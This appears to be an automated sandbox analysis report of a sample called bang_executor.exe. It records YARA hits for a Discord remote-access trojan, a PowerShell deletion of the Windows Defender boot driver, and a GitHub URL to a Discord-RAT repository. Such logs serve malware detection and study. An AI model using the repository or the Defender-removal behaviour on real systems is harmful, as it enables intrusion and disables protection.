          Source: bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49751 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected Dicrord Rat
          Source: Yara matchFile source: 3.0.bang_executor.exe.230771e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: bang_executor.exe PID: 1236, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, type: DROPPED

          System Summary

          barindex
          Very long command line found
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: Commandline size = 3122
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: Commandline size = 3122Jump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004E7FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_004E7FD3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\System32\drivers\wd\WdBoot.sys
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004EF9630_2_004EF963
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004E99060_2_004E9906
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F8C7E0_2_004F8C7E
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_005140440_2_00514044
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F60F70_2_004F60F7
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F91110_2_004F9111
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F21250_2_004F2125
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F82D00_2_004F82D0
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004EE3940_2_004EE394
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F64450_2_004F6445
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F14760_2_004F1476
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F976F0_2_004F976F
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_005077380_2_00507738
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F09490_2_004F0949
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_005079670_2_00507967
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004FEA070_2_004FEA07
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050FA900_2_0050FA90
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004E3AB70_2_004E3AB7
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004E4C6E0_2_004E4C6E
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F5E860_2_004F5E86
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050FF3E0_2_0050FF3E
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004E2FCB0_2_004E2FCB
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004F0FAC0_2_004F0FAC
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 3_2_00007FFD9BA10E653_2_00007FFD9BA10E65
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 3_2_00007FFD9BA113FA3_2_00007FFD9BA113FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 3_2_00007FFD9BA112E03_2_00007FFD9BA112E0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 3_2_00007FFD9BA112D13_2_00007FFD9BA112D1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 3_2_00007FFD9BA113D33_2_00007FFD9BA113D3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 19_2_00007FFD9BA113FA19_2_00007FFD9BA113FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 19_2_00007FFD9BA113D319_2_00007FFD9BA113D3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 19_2_00007FFD9BA112E019_2_00007FFD9BA112E0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 19_2_00007FFD9BA112D119_2_00007FFD9BA112D1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 28_2_00007FFD9BA00E6528_2_00007FFD9BA00E65
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 28_2_00007FFD9BA013FB28_2_00007FFD9BA013FB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 28_2_00007FFD9BA013D328_2_00007FFD9BA013D3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 28_2_00007FFD9BA0133C28_2_00007FFD9BA0133C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 32_2_00007FFD9BA013FB32_2_00007FFD9BA013FB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 32_2_00007FFD9BA013D332_2_00007FFD9BA013D3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeCode function: 32_2_00007FFD9BA0133C32_2_00007FFD9BA0133C
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: String function: 00501D60 appears 31 times
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: String function: 00501590 appears 57 times
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1236 -s 2324
          Source: bang_executor.exe.0.drStatic PE information: No import functions for PE file found
          Source: bang_executor.exe, 00000000.00000003.1607170188.0000000004EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekill_defender.exe$ vs bang_executor.exe
          Source: bang_executor.exe, 00000000.00000003.1607170188.0000000004EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiscord rat.exe8 vs bang_executor.exe
          Source: bang_executor.exe, 00000003.00000000.1613544617.0000023077238000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenameDiscord rat.exe8 vs bang_executor.exe
          Source: bang_executor.exe, 00000013.00000002.1765725139.0000023B862C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs bang_executor.exe
          Source: bang_executor.exe.0.drBinary or memory string: OriginalFilenameDiscord rat.exe8 vs bang_executor.exe
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: dxgidebug.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: websocket.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: websocket.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mscoree.dll
